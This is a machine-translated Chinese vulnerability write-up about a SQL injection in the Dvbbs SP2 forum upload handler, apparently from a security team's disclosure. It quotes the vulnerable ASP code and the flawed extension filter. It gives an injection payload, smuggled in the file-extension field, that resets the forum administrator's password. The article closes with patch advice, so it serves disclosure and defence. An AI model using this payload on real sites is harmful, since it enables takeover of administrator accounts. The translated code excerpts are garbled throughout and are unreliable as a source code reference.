DVSP2 Upload Vulnerability Reproduction ---- The myth of the Broken Network SP2 comes from: TNT-B Security Team This article is an article on the DVBBS! Original text
http://www.dvbbs.net/tnt-b/dvbbs.txt
May be deleted now! Hoho's previous time I heard that the upload of the moving network once again appeared the unpaid mistake, some people actually said that it is UPLOAD.INC to be wrong, I read the N-pass code carefully, you can definitely say that Upload.inc should have no way to use, today Inadvertently looked at the official website of the mobile network, I was uploaded in the personal data modification, but I didn't get it, upload.asp and post_upload.as were used as UPLOAD.INC, which proved that this file absolutely no problem That problem must be on Post_upfile.asp, open this file to read again! one look
If upload_ViewType <> 999 and F_Type = 1 thenDvbbs.execute ( "insert into dv_upFile (F_BoardID, F_UserID, F_Username, F_Filename, F_Viewname, F_FileType, F_Type, F_FileSize, F_Flag) values (" & Dvbbs.BoardID & "," & Dvbbs.UserID & ", '"& DVBBS.MEMBERNAME &"', '"& Replace (" "," ") &" "" & f_viewname ",'" "& repeate (fileext,", "") & "," & f_type & "," & Filesize & ", 4)") ElseDvbbs.execute ( "insert into dv_upFile (F_BoardID, F_UserID, F_Username, F_Filename, F_FileType, F_Type, F_FileSize, F_Flag) values (" & Dvbbs.BoardID & "," & Dvbbs.UserID & ", ' "& DVBBS.MEMBERNAME &" ',' "& Replace (Rename," "," ") &" ", '" & repeate (fileext, "," ") &", "& f_type &", "& FileSize &", 4 ) ")
There is a SQL statement. Is there a re-use of the legend to be injected instead of uploading, then we will read the variables he submitted to each other. Dvbbs.boardid, dvbbs.userid, dvbbs.mename, f_view It is certain that there is no problem, and the other few we will come and look at it. How come from these variables, how to get it! Let's talk about the first Replace (Rename, "|", "" to remove the "|" of the rename, let's take a look at how the rename variable, rename = createpath & filename & "|" is connected with CreatePath and FileName. Plus "|" generated, "|" The "|" is filtered back, you can use CreatPath and FileNameFile_Name = CreateName () filename = file_name & "Unit, then look at CreatPath and FileNameFile_name = CreateName () FileName = file_name &" Unite with File_Name and FileExt ) Private function createname () DIM RANNUMRANDOMIZERANNUM = INT (999 * RND) Createname = Year (now) & month (now) & limited (now) & second (now) & ranNumend Function
Obviously, file_name is generated by the number of random numbers based on the year, there is no way to use, and the doubts are in Fileext. . . . . Do you have to appear in the legend, first don't panic, let's take a look at other places and CreatPath is like this.
Private Function createPath () Dim objFSO, Fsofolder, uploadpathuploadpath = year (now) & "-" & month (now) 'years to create a folder to upload, format: 2003-8On Error Resume NextSet objFSO = Server.createObject ( "Scripting. FileSystemObject ") If objFSO.FolderExists (Server.MapPath (CheckFolder & uploadpath)) = False ThenobjFSO.createFolder Server.MapPath (CheckFolder & uploadpath) End IfIf Err.Number = 0 ThencreatePath = uploadpath &" / "ElsecreatePath =" "End IfSet objFSO = NothingEnd Function
Creatpath is also used with UploadPath, which is generated by the FSO, such as UploadFile / 2004-11, so that you can't take advantage of it, here you find a doubt. We will look at another variable Replace (FileExt, ".", "" "", It is directly that the fielext mentioned earlier, huh, huh, see it, it is him. Let's go out of his dragon, see if you can use set file = upload.file (formname) '' to generate a file object FileExt = FIXNAME (file.fileext) here, he began to appear file.fileext this is not us. Submit the extension, playing over the Internet, knowing, catching a package, changeing an extension This is quite normal, it seems to have a door, at least we can use this place, ====, fileext = FixName (File.FileExt) he also used to filter the fixname, we look at what is the use of this function function FixName (UpFileExt) If IsEmpty (UpFileExt) Then Exit FunctionFixName = Lcase (UpFileExt) FixName = Replace (FixName, Chr (0 ), "") FixName = Replace (FixName, "," ") Haha, put. Replace it into empty, why not using the online SP2's upload, just here FixName = Replace (fixname," ASP " , "") Replace the ASP to empty FixName = Replace (FixName, "ASA", ") ASA filter fixName = Replace (FixName," ASPX "," ") ASPX filter fixName = Replace (fixname," cer "," ") CER Filter FIXNAME = Replace (FixName," CDX "," ") CDX Filter FixName = Replace (FixName," HTR "," ") HTR Filter END FUNCTION
Haha, all only filtered some special places, but if we use the quotation marks, semicolons, commas, -, one without filtration, that is, it is unimpeded, 嘎嘎, then it is used Construct the statement, let's see his SQL statement
insert into dv_upFile (F_BoardID, F_UserID, F_Username, F_Filename, F_Viewname, F_FileType, F_Type, F_FileSize, F_Flag) values ( "& Dvbbs.BoardID &", "& Dvbbs.UserID &", ' "& Dvbbs.membername &"', ' "& replace (rename, "|", "") & "','" & F_viewname ", '" & report, "") & "," & f_type & "," & filesize & ", 4) behind Values
"& DVBBS.BOARDID &", "& DVBBS.USERID &", '"& DVBBS.MEMBERNAME &"
All of these are normal. After we change Fleext, rename has also changed, so actually back & replace (FileExt, ".", "") & We can, as long as constructing the Rename in front See how ReanMe is coming
Rename = CreatePath & FileName & "| File_Name = Createname () filename = file_name &" & fileext
CreatePath is a normal string value, can not be, file_name is also normal value, there is one. There is one in the middle. Can not count, "" He helped us filter, can not be considered. We assume that his statement is
insert into dv_upFile (F_BoardID, F_UserID, F_Username, F_Filename, F_Viewname, F_FileType, F_Type, F_FileSize, F_Flag) values ( "1", "1", ' "user"', 'uploadfile / 2004-11 / 2324128374912.jpg', 'User', 'JPG', "1", "1000", 4)
This is a normal statement. The place we can use is JPG. This place is that we can transfer in our bag. It is a local file extension, then we construct JPG into specific complete SQL statements. For example, JPG replacement
JPG ',' User ',' JPG ', "1", "1000", 4); UPDATE DV_ADMIN SET UserPassWrod =' 123 'Where UserName =' Admin '- JPG
(Say, his f_type is used to detect file type, if it is 1, that is, the previous SQL statement executed, if it is the other statement, the specific code is here
F_Type = Code CheckFiletype (FileExt) checkfiletype function is such Private Function CheckFiletype (FileExt) Dim upFiletypeDim FilePic, FileVedio, FileSoft, FileFlash, FileMusicFileExt = Lcase (Replace (FileExt, ".", "")) Select Case Lcase ( FileExt) Case "GIF", "JPG", "JPEG", "PNG", "BMP", "TIF", "IFF" checkfilety = 1case "SWF", "SWI" checkfilety = 2case "MID", "WAV" , "MP3", "RMI", "CDA" CheckfiletyPe = 3Case "AVI", "MPG", "MPEG", "RA", "RAM", "WOV", "ASF" checkfiletype = 0end SelectEnd Function This also used the fileext variable, which is our extension removes all ".", Then retrieve the extension, so our statement is finally filtered to this, because the first statement and the first The two statement is different! ), The useerpassword in the DV_Admin is changed to 123. If the Access version seems to be a bit difficult, the semicolon is unable to execute, not where conditions, can't guess, and values value can't With SELECT to fill in other values, only the value of the entire SELECT is added as a record, there is no way to get a separate value in Values, no one can have a way to construct this perfect syntax, teach , Even the SQL level is not quite high, and the Access version has not been a complete approach to a temporary. The article is over, the most important thing is that all parameters put into the SQL statement must strictly test, this place's patch is filtered in the fixName () function, if not, you will turn off first. Post the upload function, wait for the patch! :)
